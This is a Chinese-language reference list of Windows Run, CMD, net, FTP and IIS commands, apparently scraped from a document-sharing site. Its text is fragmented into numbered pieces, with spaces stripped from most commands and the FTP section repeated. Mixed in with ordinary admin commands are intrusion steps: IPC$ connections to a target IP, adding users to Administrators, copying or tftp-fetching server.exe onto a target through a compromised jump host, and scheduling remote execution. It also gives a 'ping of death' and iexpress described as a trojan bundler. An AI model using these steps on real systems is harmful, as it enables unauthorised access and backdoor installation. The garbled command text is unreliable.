1、运行中常用的命令运行中常用的命令winver-检查Windows版本wmimgmt.msc-打开windows管理体系结构(WMI)wupdmgr-windows更新程序wscript-windows脚本宿主设置write-写字板winmsd-系统信息wiaacmgr-扫描仪和照相机向导winchat-XP自带局域网聊天mem-显示内存使用情况Msconfig-系统配置实用程序mplayer2-简易widnowsmediaplayermspaint-画图板mstsc-远程桌面连接mplayer2-媒体播放机magnify-放大镜实用程序mmc-打开控制台mobsync-同步命令dxdiag-检
2、查DirectX信息drwtsn32-系统医生devmgmt.msc-设备管理器dfrg.msc-磁盘碎片整理程序diskmgmt.msc-磁盘管理实用程序dcomcnfg-打开系统组件服务ddeshare-打开DDE共享设置dvdplay-DVD播放器netstopmessenger-停止信使服务netstartmessenger-开始信使服务notepad-打开记事本nslookup-网络管理的工具向导ntbackup-系统备份和还原narrator-屏幕“讲述人”ntmsmgr.msc-移动存储管理器ntmsoprq.msc-移动存储管理员操作请求netstat-an-(TC)命令检查接
3、口syncapp-创建一个公文包sysedit-系统配置编辑器sigverif-文件签名验证程序sndrec32-录音机shrpubw-创建共享文件夹secpol.msc-本地安全策略syskey-系统加密,一旦加密就不能解开,保护windowsxp系统的双重密码services.msc-本地服务设置Sndvol32-音量控制程序sfc-系统文件检查器sfc/scannow-windows文件保护tsshutdn-60秒倒计时关机命令tourstart-xp简介(安装完成后出现的漫游xp程序)taskmgr-任务管理器eventvwr-事件查看器eudcedit-造字程序explorer-打开
4、资源管理器packager-对象包装程序perfmon.msc-计算机性能监测程序progman-程序管理器regedit-注册表rsop.msc-组策略结果集regedt32-注册表编辑器rononce-p-15秒关机regsvr32/u*.dll-停止dll文件运行regsvr32/uzipfldr.dll-取消ZIP支持cmd-CMD命令提示符chkdsk-Chkdsk磁盘检查certmgr.msc-证书管理实用程序calc-启动计算器charmap-启动字符映射表cliconfg-SQLSERVER客户端网络实用程序Clipbrd-剪贴板查看器conf-启动netmeetingcomp
5、mgmt.msc-计算机管理cleanmgr-垃圾整理ciadv.msc-索引服务程序osk-打开屏幕键盘odbcad32-ODBC数据源管理器oobe/msoobe/a-检查XP是否激活lusrmgr.msc-本机用户和组logoff-注销命令iexpress-木马捆绑工具,系统自带Nslookup-IP地址侦测器fsmgmt.msc-共享文件夹管理器utilman-辅助工具管理器gpedit.msc-组策略建议各位都收藏一份,以备用);.n限制ftp的自动登录,即不使用.netrc文件。g取消全局文件名。help命令或?命令查看命令说明bye或quit终止主机FTP进程,并退出FTP管理方
6、式.pwd列出当前远端主机目录put或send本地文件名上传到主机上的文件名将本地一个文件传送至远端主机中get或recv远程主机文件名下载到本地后的文件名从远端主机中传送至本地主机中mgetremote-files从远端主机接收一批文件至本地主机mputlocal-files将本地主机中一批文件传送至远端主机dir或lsremote-directorylocal-file列出当前远端主机目录中的文件.如果有本地文件,就将结果写至本地文件ascii设定以ASCII方式传送文件(缺省值)bin或image设定以二进制方式传送文件bell每完成一次文件传送,报警提示cdup返回上一级目录close
7、中断与远程服务器的ftp会话(与open对应)openhostport建立指定ftp服务器连接,可指定连接端口delete删除远端主机中的文件mdeleteremote-files删除一批文件mkdirdirectory-name在远端主机中建立目录renamefromto改变远端主机中的文件名rmdirdirectory-name删除远端主机中的目录status显示当前FTP的状态system显示远端主机系统类型useruser-namepasswordaccount重新以别的用户名登录远端主机openhostport重新建立一个新的连接prompt交互提示模式macdef定义宏命令lcd改
8、变当前本地主机的工作目录,如果缺省,就转到当前用户的HOME目录chmod改变远端主机的文件权限case当为ON时,用MGET命令拷贝的文件名到本地机器中,全部转换为小写字母cdremotedir进入远程主机目录cdup进入远程主机目录的父目录!在本地机中执行交互shell,exit回到ftp环境,如!ls.zip在“运行”中输入CMD,调出DOSnetuse$ipipc$/user:建立IPC空链接netuse$ipipc$密码/user:用户名建立IPC非空链接netuseh:$ipc$密码/user:用户名直接登陆后映射对方C:到本地为H:netuseh:$ipc$登陆后映射对方C:到本
9、地为H:netuse$ipipc$/del删除IPC链接netuseh:/del删除映射对方到本地的为H:的映射netuser用户名密码/add建立用户netuserguest/active:yes激活guest用户netuser查看有哪些用户netuser帐户名查看帐户的属性netlocalgroupadministrators用户名/add把“用户”添加到管理员中使其具有管理员权限,注意:administrator后加s用复数netstart查看开启了哪些服务netstart服务名开启服务;(如:netstarttelnet,netstartschedule)netstop服务名停止某服务
10、nettime目标ip查看对方时间nettime目标ip/set设置本地计算机时间与“目标IP”主机的时间同步,加上参数/yes可取消确认信息netview查看本地局域网内开启了哪些共享netviewip查看对方局域网内开启了哪些共享netconfig显示系统网络设置netlogoff断开连接的共享netpause服务名暂停某服务netsendip文本信息向对方发信息netver局域网内正在使用的网络连接类型和信息netshare查看本地开启的共享netshareipc$开启ipc$共享netshareipc$/del删除ipc$共享netsharec$/del删除C:共享netusergue
11、st12345用guest用户登陆后用将密码改为12345netpassword密码更改系统登陆密码netstat-a查看开启了哪些端口,常用netstat-annetstat-n查看端口的网络连接情况,常用netstat-annetstat-v查看正在进行的工作netstat-p协议名例:netstat-ptcq/ip查看某协议使用情况(查看tcp/ip协议使用情况)netstat-s查看正在使用的所有协议使用情况nbtstat-Aip对方136到139其中一个端口开了的话,就可查看对方最近登陆的用户名(03前的为用户名)-注意:参数-A要大写tracert-参数ip(或计算机名)跟踪路由(
12、数据包),参数:“-w数字”用于设置超时间隔。pingip(或域名) 向对方主机发送默认大小为32字节的数据,参数:“-l空格数据包大小”;“-n发送数据次数”;“-t”指一直ping。ping-t-l65550ip死亡之ping(发送大于64K的文件并一直ping就成了死亡之ping)ipconfig(winipcfg)用于windowsNT及XP(windows9598)查看本地ip地址,ipconfig可用参数“/all”显示全部配置信息tlist-t以树行列表显示进程(为系统的附加工具,默认是没有安装的,在安装目录的Support/tools文件夹内)kill -F 进程名 加-F参数
13、后强制结束某进程(为系统的附加工具,默认是没有安装的,在安装目录的Support/tools文件夹内)del-F文件名加-F参数后就可删除只读文件,/AR、/AH、/AS、/AA分别表示删除只读、隐藏、系统、存档文件,/A-R、/A-H、/A-S、/A-A表示删除除只读、隐藏、系统、存档以外的文件。例如“DEL/AR*.*”表示删除当前目录下所有只读文件,DEL/A-S*.*”表示删除当前目录下除系统文件以外的所有文件del/S/Q目录或用:rmdir/s/Q目录/S删除目录及目录下的所有子目录和文件。同时使用参数/Q可取消删除操作时的系统确认就直接删除。(二个命令作用相同)move盘符路径要
14、移动的文件名存放移动文件的路径移动后文件名移动文件,用参数/y将取消确认移动目录存在相同文件的提示就直接覆盖fcone.txttwo.txt3st.txt对比二个文件并把不同之处输出到3st.txt文件中,和是重定向命令atid号开启已注册的某个计划任务at/delete停止所有计划任务,用参数/yes则不需要确认就直接停止atid号/delete停止某个已注册的计划任务at查看所有的计划任务atiptime程序名(或一个命令)/r在某时间运行对方某程序并重新启动计算机fingerusernamehost查看最近有哪些用户登陆telnetip端口远和登陆服务器,默认端口为23openip连接到
15、IP(属telnet登陆后的命令)telnet在本机上直接键入telnet将进入本机的telnetcopy路径文件名1路径文件名2/y复制文件1到指定的目录为文件2,用参数/y就同时取消确认你要改写一份现存目录文件copyc:srv.exe$ipadmin$复制本地c:srv.exe到对方的admin下cppy1st.jpg/b+2st.txt/a3st.jpg将2st.txt的内容藏身到1st.jpg中生成3st.jpg新的文件,注:2st.txt文件头要空三排,参数:/b指二进制文件,/a指ASCLL格式文件copy$svv.exeipadmin$svv.exec:或:copyipadmi
16、n$*.*复制对方admini$共享下的srv.exe文件(所有文件)至本地C:xcopy要复制的文件或目录树目标地址目录名复制文件和目录树,用参数/Y将不提示覆盖相同文件tftp-i自己IP(用肉机作跳板时这用肉机IP)getserver.exec:server.exe登陆后,将“IP”的server.exe下载到目标主机c:server.exe参数:-i指以二进制模式传送,如传送exe文件时用,如不加-i则以ASCII模式(传送文本文件模式)进行传送tftp-i对方IPputc:server.exe登陆后,上传本地c:server.exe至主机ftpip端口用于上传文件至服务器或进行文件操
17、作,默认端口为21。bin指用二进制方式传送(可执行文件进);默认为ASCII格式传送(文本文件时)route print 显示出IP路由,将主要显示网络地址Network addres,子网掩码Netmask,网关地址Gatewayaddres,接口地址Interfacearp查看和处理ARP缓存,ARP是名字解析的意思,负责把一个IP解析成一个物理性的MAC地址。arp-a将显示出全部信息start程序名或命令/max或/min新开一个新窗口并最大化(最小化)运行某程序或命令mem查看cpu使用情况attrib文件名(目录名)查看某文件(目录)的属性attrib文件名-A-R-S-H或+A
18、+R+S+H去掉(添加)某文件的存档,只读,系统,隐藏属性;用则是添加为某属性dir 查看文件,参数:/Q显示文件及目录属系统哪个用户,/T:C显示文件创建时间,/T:A显示文件上次被访问时间,/T:W上次被修改时间date/t、time/t使用此参数即“DATE/T”、TIME/T”将只显示当前日期和时间,而不必输入新日期和时间set指定环境变量名称=要指派给变量的字符设置环境变量set显示当前所有的环境变量setp(或其它字符)显示出当前以字符p(或其它字符)开头的所有环境变量pause暂停批处理程序,并显示出:请按任意键继续.if在批处理程序中执行条件处理(更多说明见if命令及变量)go
19、to 标签 将cmd.exe导向到批处理程序中带标签的行(标签必须单独一行,且以冒号打头,例如:“:start”标签)call路径批处理文件名从批处理程序中调用另一个批处理程序(更多说明见call/?)for对一组文件中的每一个文件执行某个特定命令(更多说明见for命令及变量)echoon或off打开或关闭echo,仅用echo不加参数则显示当前echo设置echo信息在屏幕上显示出信息echo信息pass.txt将信息保存到pass.txt文件中findstrHelloaa.txt在aa.txt文件中寻找字符串hellofind文件名查找某文件title标题名字更改CMD窗口标题名字colo
20、r颜色值设置cmd控制台前景和背景颜色;0黑、1蓝、2绿、3浅绿、4红、5紫、6黄、7=白、8=灰、9=淡蓝、A淡绿、B=淡浅绿、C=淡红、D=淡紫、E=淡黄、F=亮白prompt名称更改cmd.exe的显示的命令提示符(把C:、D:统一改为:EntSky)print文件名打印文本文件ver在DOS窗口下显示版本信息winver弹出一个窗口显示版本信息(内存大小、系统版本、补丁版本、计算机名)format盘符/FS:类型格式化磁盘,类型:FAT、FAT32、NTFS,例:FormatD:/FS:NTFSmd目录名创建目录replace源文件要替换文件的目录替换文件ren原文件名新文件名重命名文
21、件名tree以树形结构显示出目录,用参数-f将列出第个文件夹中文件名称type文件名显示文本文件的内容more文件名逐屏显示输出文件doskey要锁定的命令字符doskey要解锁命令=为DOS提供的锁定命令(编辑命令行,重新调用win2k命令,并创建宏)。如:锁定dir命令:doskeydir=entsky(不能用doskeydir=dir);解锁:doskeydir=taskmgr调出任务管理器chkdsk/FD:检查磁盘D并显示状态报告;加参数/f并修复磁盘上的错误tlntadmntelnt服务admn,键入tlntadmn选择3,再选择8,就可以更改telnet服务默认端口23为其它任何
22、端口exit退出cmd.exe程序或目前,用参数/B则是退出当前批处理脚本而不是cmd.exepath路径可执行文件的文件名为可执行文件设置一个路径。cmd启动一个win2K命令解释窗口。参数:/eff、/en关闭、开启命令扩展;更我详细说明见cmd/?regedit/s注册表文件名导入注册表;参数/S指安静模式导入,无任何提示;regedit/e注册表文件名导出注册表cacls文件名参数显示或修改文件访问控制列表(ACL)针对NTFS格式时。参数:/D用户名:设定拒绝某用户访问;/P用户名:perm替换指定用户的访问权限;/G用户名:perm赋予指定用户访问权限;Perm可以是:N无,R读取
23、,W写入,C更改(写入),F完全控制;例:caclsD:test.txt/Dpub设定d:test.txt拒绝pub用户访问。cacls文件名查看文件的访问用户权限列表REM文本内容在批处理文件中添加注解netsh查看或更改本地网络配置情况IIS服务命令:iisreset/reboot重启win2k计算机(但有提示系统将重启信息出现)iisreset/start或stop启动(停止)所有Internet服务iisreset/restart停止然后重新启动所有Internet服务iisreset/status显示所有Internet服务状态iisreset/enable或disable在本地系统
24、上启用(禁用)Internet服务的重新启动iisreset/rebootonerror当启动、停止或重新启动Internet服务时,若发生错误将重新开机iisreset/noforce若无法停止Internet服务,将不会强制终止Internet服务iisreset/timeoutVal在到达逾时间(秒)时,仍未停止Internet服务,若指定/rebootonerror参数,则电脑将会重新开机。预设值为重新启动20秒,停止60秒,重新开机0秒。FTP命令:(后面有详细说明内容)ftp的命令行格式为:ftpvding主机名v显示远程服务器的所有响应信息。d使用调试方式。n限制ftp的自动登录
25、,即不使用.netrc文件。g取消全局文件名。help命令或?命令查看命令说明bye或quit终止主机FTP进程,并退出FTP管理方式.pwd列出当前远端主机目录put或send本地文件名上传到主机上的文件名将本地一个文件传送至远端主机中get或recv远程主机文件名下载到本地后的文件名从远端主机中传送至本地主机中mgetremote-files从远端主机接收一批文件至本地主机mputlocal-files将本地主机中一批文件传送至远端主机dir或lsremote-directorylocal-file列出当前远端主机目录中的文件.如果有本地文件,就将结果写至本地文件ascii设定以ASCII
26、方式传送文件(缺省值)bin或image设定以二进制方式传送文件bell每完成一次文件传送,报警提示cdup返回上一级目录close中断与远程服务器的ftp会话(与open对应)openhostport建立指定ftp服务器连接,可指定连接端口delete删除远端主机中的文件mdeleteremote-files删除一批文件mkdirdirectory-name在远端主机中建立目录renamefromto改变远端主机中的文件名rmdirdirectory-name删除远端主机中的目录status显示当前FTP的状态system显示远端主机系统类型useruser-namepasswordaccount重新以别的用户名登录远端主机openhostport重新建立一个新的连接prompt交互提示模式macdef定义宏命令lcd改变当前本地主机的工作目录,如果缺省,就
copyright@ 2008-2022 冰豆网网站版权所有
经营许可证编号:鄂ICP备2022015515号-1